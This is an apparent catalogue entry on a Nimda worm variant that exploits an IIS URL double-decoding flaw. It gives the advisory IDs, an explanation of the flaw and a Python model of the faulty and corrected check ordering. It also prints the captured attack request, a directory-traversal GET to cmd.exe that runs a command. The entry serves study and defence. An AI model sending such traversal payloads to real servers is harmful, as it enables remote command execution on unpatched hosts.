Nimda, variant 04

Against

IIS on Windows

IDs

Bugtraq: 2708
Microsoft: MS01-020
CERT-Advisory: CA-2001-26
CERT-Vuln: 111677
CVE: CAN-2001-0333

Category

URL decoding error

Effect

Remote access

Source

Captured with snort

Description

A URI (RFC 2396) has a limited set of allowed characters. Since this set is smaller than the set of allowable characters in filenames, the standard allows special characters to be encoded as % followed by the hex value of the character.

The flaw was that IIS decoded some of the input twice. IIS checks the path for security after the first decoding, but it is the second decoding that controls the file actually accessed.

NSFocus has a good description of the flaw. CERT claims they found the flaw.

Nimda had several other transmission methods not involving web servers.

Nimda used at least 18 variants.

Attack string

GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www
Connnection: close
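Added illustration, not part of this entry: the check-before-second-decode ordering described above, modelled in Python against the request path from the captured string. The forgiving decoder in `lenient_utf8` is an assumed simplification of the server's behaviour, not IIS code; `vulnerable_resolve` and `fixed_resolve` are hypothetical names.

```python
from urllib.parse import unquote_to_bytes

# Request path from the captured attack string above.
ATTACK = "/scripts/..%c1%1c../winnt/system32/cmd.exe"


def lenient_utf8(data):
    """Assumed model of a forgiving decoder: a two-byte lead byte is combined with
    whatever byte follows it, without checking for the 10xxxxxx continuation prefix.
    0xC1 0x1C therefore becomes ((0x01 << 6) | 0x1C) = 0x5C, a backslash."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def escapes_root(path):
    """True if the path climbs above the web root; '\\' counts as a separator as on Windows."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        depth += -1 if seg == ".." else 1
        if depth < 0:
            return True
    return False


def vulnerable_resolve(path):
    """Flawed ordering: check after the first (percent) decode, serve the second decode's result."""
    once = unquote_to_bytes(path)           # '%c1%1c' -> b'\xc1\x1c', still no separator
    if escapes_root(once.decode("latin-1")):
        return None                         # the check sees '..\xc1\x1c..' as one harmless segment
    return lenient_utf8(once)               # second decode yields '..\\..', which is what gets opened


def fixed_resolve(path):
    """Corrected ordering: decode fully and strictly, then check the final form."""
    try:
        final = unquote_to_bytes(path).decode("utf-8")   # malformed sequences are rejected outright
    except UnicodeDecodeError:
        return None
    return None if escapes_root(final) else final
```

The defensive lesson is the one the description states: authorisation must run on the canonical form that the filesystem will actually see, never on an intermediate decoding.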

Attack program source

None available.